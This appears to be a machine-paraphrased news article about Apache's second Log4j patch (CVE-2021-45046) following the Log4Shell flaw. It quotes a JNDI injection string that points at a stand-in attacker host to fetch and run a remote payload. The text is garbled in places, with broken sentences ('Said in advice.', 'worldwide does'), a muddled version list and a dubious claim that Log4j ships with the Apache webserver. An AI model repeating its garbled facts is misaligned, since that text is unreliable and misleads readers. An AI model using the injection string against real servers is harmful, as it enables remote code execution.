The Apache Software Foundation (ASF) has released a new patch for the Log4j logging utility after the previous patch was deemed insufficient in certain non-default configurations following the recent disclosure of the Log4Shell exploit. The second vulnerability – tracked as CVE-2021-45046 – is rated a maximum of 3.7 out of 10 on the CVSS rating system and all versions of Log4j are rated 2.0-beta 9 to 2.12.1 and 2.13.0 to 2.15. 0, which was sent to project maintainers last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be misused to infiltrate and take over the system. The incomplete patch for CVE-2021-44228 “could be misused to craft malicious input data using JNDI lookup patterns, resulting in a denial-of-service (DoS) attack,” the ASF said in a new report. Said in advice. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), removes support for message lookup and disables JNDI by default, the component at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12. “The handling of CVE-2021-44228 showed that there are significant security issues in JNDI,” explained ASF’s Ralph Goers. “While we have narrowed it down from what we know, it would be safer for users to completely disable it by default, especially since a large number of people are unlikely to use it.” JNDI, short for Java Naming and Directory Interface, is a Java API that enables applications coded in the programming language to view data and resources such as LDAP servers. Log4Shell is native to the Log4j library, an open-source, Java-based logging framework commonly included in the Apache webserver.
The problem occurs when the JNDI component of the LDAP connector is leveraged to inject a malicious LDAP request – something like “${jndi:ldap://attacker_controled_website/payload_to_be_executed}” – when logged on to a web server running the vulnerable version. of the library, enables an adversary to retrieve a payload from a remote domain and execute it locally. The security flaw has sparked widespread alarm as it exists in a logging framework used almost ubiquitously in Java applications, presenting bad actors with an unprecedented gateway to penetrate and compromise millions of devices worldwide does.
